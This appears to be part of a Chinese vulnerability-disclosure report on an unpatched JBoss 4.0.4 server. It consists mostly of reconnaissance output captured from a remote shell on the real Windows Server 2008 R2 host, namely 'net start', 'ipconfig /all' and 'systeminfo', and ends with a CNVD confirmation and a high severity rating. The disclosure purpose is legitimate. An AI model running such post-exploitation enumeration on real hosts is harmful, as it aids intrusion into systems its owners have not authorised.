NetBIOS Helper User Profile Service Windows Event Log Windows Firewall Windows Management Instrumentation Windows Process Activation Service Windows Update Workstation World Wide Web Publishing Service 主动防御命令成功完成。D:\webserver1\jboss404\bin\> ipconfig /allWindows IP 配置 主机名 . . . . . . . . . . . . . : WINDOWS-4H2Q2BT 主 DNS 后缀 . . . . . . . . . . . : 节点类型 . . . . . . . . . . . . : 混合 IP 路由已启用 . . . . . . . . . . : 否 WINS 代理已启用 . . . . . . . . . : 否以太网适配器 本地连接 3: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) #55 物理地址. . . . . . . . . . . . . : 34-40-B5-AB-13-0A DHCP 已启用 . . . . . . . . . . . : 是 自动配置已启用. . . . . . . . . . : 是以太网适配器 本地连接 2: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) #54 物理地址. . . . . . . . . . . . . : 34-40-B5-AB-13-08 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 IPv4 地址 . . . . . . . . . . . . : **.**.**.**(首选) 子网掩码 . . . . . . . . . . . . : **.**.**.** 默认网关. . . . . . . . . . . . . : **.**.**.** DNS 服务器 . . . . . . . . . . . : **.**.**.** TCPIP 上的 NetBIOS . . . . . . . : 已启用以太网适配器 本地连接: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : IBM USB Remote NDIS Network Device 物理地址. . . . . . . . . . . . . : 36-40-B5-AE-01-D3 DHCP 已启用 . . . . . . . . . . . : 是 自动配置已启用. . . . . . . . . . : 是 IPv4 地址 . . . . . . . . . . . . : **.**.**.**(首选) 子网掩码 . . . . . . . . . . . . : **.**.**.** 获得租约的时间 . . . . . . . . . : 2015年11月9日 10:24:00 租约过期的时间 . . . . . . . . . : 2015年12月11日 17:41:19 默认网关. . . . . . . . . . . . . : DHCP 服务器 . . . . . . . . . . . : **.**.**.** TCPIP 上的 NetBIOS . . . . . . . : 已启用隧道适配器 isatap.{0BA75B8E-7C63-4C84-B475-E626C3BCA470}: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是隧道适配器 isatap.{F7081466-3887-483C-BB88-B20A64D0FE9A}: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #2 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是隧道适配器 isatap.{B88446EC-5976-4759-9662-2339A082D11E}: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #3 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是隧道适配器 Teredo Tunneling Pseudo-Interface: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是D:\webserver1\jboss404\bin\> net start已经启动以下 Windows 服务: 360 杀毒实时防护加载服务 360EntClientService AnyBackupClientEngine Application Experience Application Host Helper Service ArcGIS License Manager ArcGIS Server Object Manager ArcGIS SOC Monitor Background Intelligent Transfer Service Base Filtering Engine Certificate Propagation COM+ Event System Cryptographic Services DbSecuritySpt DCOM Server Process Launcher Desktop Window Manager Session Manager DHCP Client Diagnostic Policy Service DNS Client Function Discovery Provider Host Group Policy Client Human Interface Device Access IIS Admin Service IKE and AuthIP IPsec Keying Modules IP Helper IPsec Policy Agent Microsoft FTP Service Network Connections Network List Service Network Location Awareness Network Store Interface Service OracleDBConsolesafe Plug and Play Power Print Spooler QPCore Service Remote Desktop Configuration Remote Desktop Services Remote Desktop Services UserMode Port Redirector Remote Procedure Call (RPC) RPC Endpoint Mapper Security Accounts Manager Server Shell Hardware Detection SNMP Service System Event Notification Service Task Scheduler TCP/IP NetBIOS Helper User Profile Service Windows Event Log Windows Firewall Windows Management Instrumentation Windows Process Activation Service Windows Update Workstation World Wide Web Publishing Service 主动防御命令成功完成。D:\webserver1\jboss404\bin\> systeminfo主机名: WINDOWS-4H2Q2BTOS 名称: Microsoft Windows Server 2008 R2 Standard OS 版本: 6.1.7601 Service Pack 1 Build 7601OS 制造商: Microsoft CorporationOS 配置: 独立服务器OS 构件类型: Multiprocessor Free注册的所有人: Windows 用户注册的组织: 产品 ID: 00477-OEM-8421472-63364初始安装日期: 2012/11/13, 17:22:14系统启动时间: 2015/11/9, 10:23:03系统制造商: IBM系统型号: System x3650 M3 -[7945NVO]-系统类型: x64-based PC处理器: 安装了 2 个处理器。 [01]: Intel64 Family 6 Model 44 Stepping 2 GenuineIntel ~2394 Mhz [02]: Intel64 Family 6 Model 44 Stepping 2 GenuineIntel ~2394 MhzBIOS 版本: IBM Corp. -[D6E156BUS-1.14]-, 2012/2/2Windows 目录: C:\Windows系统目录: C:\Windows\system32启动设备: \Device\HarddiskVolume1系统区域设置: zh-cn;中文(中国)输入法区域设置: zh-cn;中文(中国)时区: (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐物理内存总量: 16,373 MB可用的物理内存: 6,158 MB虚拟内存: 最大值: 32,743 MB虚拟内存: 可用: 22,018 MB虚拟内存: 使用中: 10,725 MB页面文件位置: C:\pagefile.sys域: WORKGROUP登录服务器: \\WINDOWS-4H2Q2BT修补程序: 安装了 5 个修补程序。 [01]: KB2758857 [02]: KB2761465 [03]: KB2770660 [04]: KB2779030 [05]: KB976902网卡: 安装了 3 个 NIC。 [01]: IBM USB Remote NDIS Network Device 连接名: 本地连接 启用 DHCP: 是 DHCP 服务器: **.**.**.** IP 地址 [01]: **.**.**.** [02]: Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) 连接名: 本地连接 2 启用 DHCP: 否 IP 地址 [01]: **.**.**.** [03]: Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) 连接名: 本地连接 3 状态: 媒体连接已中断D:\webserver1\jboss404\bin\>
危害等级:高
漏洞Rank:12
确认时间:2015-12-21 18:50
CNVD确认所述情况,已经转由CNCERT下发给新疆分中心,由其后续协调网站管理单位处置.
暂无
